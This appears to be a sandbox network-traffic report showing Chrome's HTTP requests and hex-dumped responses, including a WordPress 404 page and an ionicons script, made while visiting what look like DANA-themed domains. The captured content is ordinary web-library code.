                                                                                                                            2024-10-06 11:50:07 UTC1390INData Raw: ed f2 f9 ed f2 f9 ec f1 f9 eb f1 f9 eb f0 f9 ea f0 f9 e9 f0 fa e7 f2 fb e6 f4 fc e7 f6 fc e7 f7 fd e6 f7 fd e0 f6 fd db f6 fd d9 f7 fe d7 f7 fe d5 f8 fe d2 f9 fe d0 f9 fe cd f9 fe ca f8 fe c8 f7 fe c7 f7 fe 08 fe 00 5d 08 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b 17 2e 15 81 67 ee d6 dd cb b7 2f dc 2e 5e ba 30 82 94 af f0 bd 7b c9 92 dd cb a7 4f d2 97 2f 5e bc f8 9d 4c b9 b2 d5 35 8b 20 f5 eb c7 ef f0 b1 79 a0 93 1d db
                                                                                                                            Data Ascii: ]H*\#JH3j CI(S\0cI8s@JH*]PJJXj`Kh]pK.g/.^0{O/^L5 y


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.64973723.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC681OUTGET /external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: https://dev-danapemulihan.pantheonsite.io/asset/main.css
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC740INHTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 57063
                                                                                                                            Cache-Control: public, max-age=600
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Link: <https://dev-danapemulihan.pantheonsite.io/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-d4wlz
                                                                                                                            X-Styx-Req-Id: 21c02976-83d9-11ef-b28b-da76a97beae0
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-klot8100053-CHI, cache-ewr-kewr1740055-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.896300,VS0,VE179
                                                                                                                            Vary: Accept-Encoding, Cookie, Cookie
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:07 UTC1371INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 44 61 74 61 62 61 73 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="id-ID"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, nofollow' /><title>Page not found &#8211; Database</title><link rel='dns-p
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 62 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66
                                                                                                                            Data Ascii: ata(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22
                                                                                                                            Data Ascii: =typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 2e 69 73 2d 73 74 79 6c 65 2d 72 6f 75 6e 64 65 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d
                                                                                                                            Data Ascii: dth:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}.wp-block-site-logo.is-style-rounded{border-radius:9999px}</style><style id='wp-block-site-
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 72 5d 29 2c 68 32 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 34 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69
                                                                                                                            Data Ascii: r]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=wri
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 72 74 6c 20 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09
                                                                                                                            Data Ascii: }.is-style-asterisk.has-text-align-center:before {margin: 0 auto;}.is-style-asterisk.has-text-align-right:before {margin-left: auto;}.rtl .is-style-asterisk.has-text-align-left:before {margin-right: auto;
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 3a 6e 6f 77 72 61 70 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 69 6e 69 74 69 61 6c 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 72 65 6d 3b 70 61 64 64 69 6e 67 3a 38 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 73 65 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 70 2d 62
                                                                                                                            Data Ascii: :nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-b
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 70 61 64 64 69 6e 67 3a 30 20 34 70 78 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61
                                                                                                                            Data Ascii: rch__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-sea
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 61 72 65 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 74 6f 70 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 61 72 65 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 63 65 6e 74 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62
                                                                                                                            Data Ascii: r-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.649736104.17.249.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC630OUTGET /ionicons@7.1.0/dist/ionicons/p-d15ec307.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            Origin: http://penukran-poin-dana.aktsx.cfd
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC575INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"21d1-dJ29Zq7KcbnJnZUTvF7HPfVtDCE"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01J8RC11KKPFR4520Q8ZKP182A-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 820629
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56e956958c454-EWR
                                                                                                                            2024-10-06 11:50:07 UTC794INData Raw: 32 31 64 31 0d 0a 6c 65 74 20 65 2c 74 2c 6e 3d 21 31 3b 63 6f 6e 73 74 20 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 7b 7d 2c 73 3d 6c 2e 64 6f 63 75 6d 65 6e 74 7c 7c 7b 68 65 61 64 3a 7b 7d 7d 2c 6f 3d 7b 74 3a 30 2c 6c 3a 22 22 2c 6a 6d 70 3a 65 3d 3e 65 28 29 2c 72 61 66 3a 65 3d 3e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 65 29 2c 61 65 6c 3a 28 65 2c 74 2c 6e 2c 6c 29 3d 3e 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 6c 29 2c 72 65 6c 3a 28 65 2c 74 2c 6e 2c 6c 29 3d 3e 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6e 2c 6c 29 2c 63 65 3a 28 65 2c 74 29 3d 3e 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 65
                                                                                                                            Data Ascii: 21d1let e,t,n=!1;const l="undefined"!=typeof window?window:{},s=l.document||{head:{}},o={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e
                                                                                                                            2024-10-06 11:50:07 UTC1369INData Raw: 7c 74 2e 63 6c 61 73 73 3b 65 26 26 28 74 2e 63 6c 61 73 73 3d 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 3f 65 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 5b 74 5d 29 29 2e 6a 6f 69 6e 28 22 20 22 29 29 7d 7d 63 6f 6e 73 74 20 75 3d 68 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 75 2e 75 3d 74 2c 63 2e 6c 65 6e 67 74 68 3e 30 26 26 28 75 2e 24 3d 63 29 2c 75 2e 68 3d 73 2c 75 7d 2c 68 3d 28 65 2c 74 29 3d 3e 28 7b 74 3a 30 2c 70 3a 65 2c 69 3a 74 2c 6d 3a 6e 75 6c 6c 2c 24 3a 6e 75 6c 6c 2c 75 3a 6e 75 6c 6c 2c 68 3a 6e 75 6c 6c 7d 29 2c 64 3d 7b 7d 2c 70 3d 28 65 2c 74 2c 6e 2c 73 2c 69 2c 63 29 3d 3e 7b 69 66 28 6e 21 3d 3d 73 29 7b 6c 65 74 20 75 3d 44 28 65 2c 74 29 2c 61 3d 74 2e 74 6f 4c 6f 77
                                                                                                                            Data Ascii: |t.class;e&&(t.class="object"!=typeof e?e:Object.keys(e).filter((t=>e[t])).join(" "))}}const u=h(e,null);return u.u=t,c.length>0&&(u.$=c),u.h=s,u},h=(e,t)=>({t:0,p:e,i:t,m:null,$:null,u:null,h:null}),d={},p=(e,t,n,s,i,c)=>{if(n!==s){let u=D(e,t),a=t.toLow
                                                                                                                            2024-10-06 11:50:07 UTC1369INData Raw: 7d 2c 67 3d 28 74 2c 6e 2c 6c 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 6e 2e 24 5b 6c 5d 3b 6c 65 74 20 69 2c 63 2c 72 3d 30 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6f 2e 69 29 69 3d 6f 2e 6d 3d 73 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6f 2e 69 29 3b 65 6c 73 65 20 69 66 28 69 3d 6f 2e 6d 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 70 29 2c 62 28 6e 75 6c 6c 2c 6f 2c 21 31 29 2c 6e 75 6c 6c 21 3d 65 26 26 69 5b 22 73 2d 73 69 22 5d 21 3d 3d 65 26 26 69 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 69 5b 22 73 2d 73 69 22 5d 3d 65 29 2c 6f 2e 24 29 66 6f 72 28 72 3d 30 3b 72 3c 6f 2e 24 2e 6c 65 6e 67 74 68 3b 2b 2b 72 29 63 3d 67 28 74 2c 6f 2c 72 29 2c 63 26 26 69 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 69 7d 2c 6b
                                                                                                                            Data Ascii: },g=(t,n,l)=>{const o=n.$[l];let i,c,r=0;if(null!==o.i)i=o.m=s.createTextNode(o.i);else if(i=o.m=s.createElement(o.p),b(null,o,!1),null!=e&&i["s-si"]!==e&&i.classList.add(i["s-si"]=e),o.$)for(r=0;r<o.$.length;++r)c=g(t,o,r),c&&i.appendChild(c);return i},k
                                                                                                                            2024-10-06 11:50:07 UTC1369INData Raw: 30 2c 6c 2e 6c 65 6e 67 74 68 2d 31 29 29 3a 65 2e 69 21 3d 3d 6f 26 26 28 6e 2e 64 61 74 61 3d 6f 29 7d 2c 43 3d 65 3d 3e 7b 65 2e 75 26 26 65 2e 75 2e 72 65 66 26 26 65 2e 75 2e 72 65 66 28 6e 75 6c 6c 29 2c 65 2e 24 26 26 65 2e 24 2e 6d 61 70 28 43 29 7d 2c 4d 3d 65 3d 3e 5f 28 65 29 2e 67 2c 4f 3d 28 65 2c 74 29 3d 3e 7b 74 26 26 21 65 2e 6b 26 26 74 5b 22 73 2d 70 22 5d 26 26 74 5b 22 73 2d 70 22 5d 2e 70 75 73 68 28 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 65 2e 6b 3d 74 29 29 29 7d 2c 78 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 74 7c 3d 31 36 2c 21 28 34 26 65 2e 74 29 29 72 65 74 75 72 6e 20 4f 28 65 2c 65 2e 53 29 2c 6e 65 28 28 28 29 3d 3e 4c 28 65 2c 74 29 29 29 3b 65 2e 74 7c 3d 35 31 32 7d 2c 4c 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73
                                                                                                                            Data Ascii: 0,l.length-1)):e.i!==o&&(n.data=o)},C=e=>{e.u&&e.u.ref&&e.u.ref(null),e.$&&e.$.map(C)},M=e=>_(e).g,O=(e,t)=>{t&&!e.k&&t["s-p"]&&t["s-p"].push(new Promise((t=>e.k=t)))},x=(e,t)=>{if(e.t|=16,!(4&e.t))return O(e,e.S),ne((()=>L(e,t)));e.t|=512},L=(e,t)=>{cons
                                                                                                                            2024-10-06 11:50:07 UTC1369INData Raw: 28 28 29 3d 3e 78 28 65 2c 21 31 29 29 29 2c 65 2e 74 26 3d 2d 35 31 37 7d 2c 52 3d 28 29 3d 3e 7b 57 28 73 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2c 74 65 28 28 28 29 3d 3e 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 6f 2e 63 65 28 22 61 70 70 6c 6f 61 64 22 2c 7b 64 65 74 61 69 6c 3a 7b 6e 61 6d 65 73 70 61 63 65 3a 22 69 6f 6e 69 63 6f 6e 73 22 7d 7d 29 3b 72 65 74 75 72 6e 20 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 74 29 2c 74 7d 29 28 6c 29 29 29 7d 2c 54 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 69 66 28 65 26 26 65 5b 74 5d 29 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 74 5d 28 6e 29 7d 63 61 74 63 68 28 65 29 7b 47 28 65 29 7d 7d 2c 55 3d 28 65 2c 74 29 3d 3e 65 26 26 65 2e 74 68 65 6e 3f 65 2e 74 68 65 6e 28 74 29 3a 74 28 29 2c 57 3d 65 3d 3e
                                                                                                                            Data Ascii: (()=>x(e,!1))),e.t&=-517},R=()=>{W(s.documentElement),te((()=>(e=>{const t=o.ce("appload",{detail:{namespace:"ionicons"}});return e.dispatchEvent(t),t})(l)))},T=(e,t,n)=>{if(e&&e[t])try{return e[t](n)}catch(e){G(e)}},U=(e,t)=>e&&e.then?e.then(t):t(),W=e=>
                                                                                                                            2024-10-06 11:50:07 UTC1369INData Raw: 74 73 2c 75 3d 73 2e 68 65 61 64 2c 66 3d 75 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6d 65 74 61 5b 63 68 61 72 73 65 74 5d 22 29 2c 79 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 2c 24 3d 5b 5d 3b 6c 65 74 20 68 2c 64 3d 21 30 3b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2c 74 29 2c 6f 2e 6c 3d 6e 65 77 20 55 52 4c 28 74 2e 72 65 73 6f 75 72 63 65 73 55 72 6c 7c 7c 22 2e 2f 22 2c 73 2e 62 61 73 65 55 52 49 29 2e 68 72 65 66 2c 65 2e 6d 61 70 28 28 65 3d 3e 7b 65 5b 31 5d 2e 6d 61 70 28 28 74 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 7b 74 3a 74 5b 30 5d 2c 6f 3a 74 5b 31 5d 2c 4c 3a 74 5b 32 5d 2c 52 3a 74 5b 33 5d 7d 3b 6c 2e 4c 3d 74 5b 32 5d 2c 6c 2e 4d 3d 5b 5d 2c 6c 2e 50 3d 7b 7d 3b 63 6f 6e 73 74 20 73 3d 6c 2e 6f
                                                                                                                            Data Ascii: ts,u=s.head,f=u.querySelector("meta[charset]"),y=s.createElement("style"),$=[];let h,d=!0;Object.assign(o,t),o.l=new URL(t.resourcesUrl||"./",s.baseURI).href,e.map((e=>{e[1].map((t=>{const l={t:t[0],o:t[1],L:t[2],R:t[3]};l.L=t[2],l.M=[],l.P={};const s=l.o
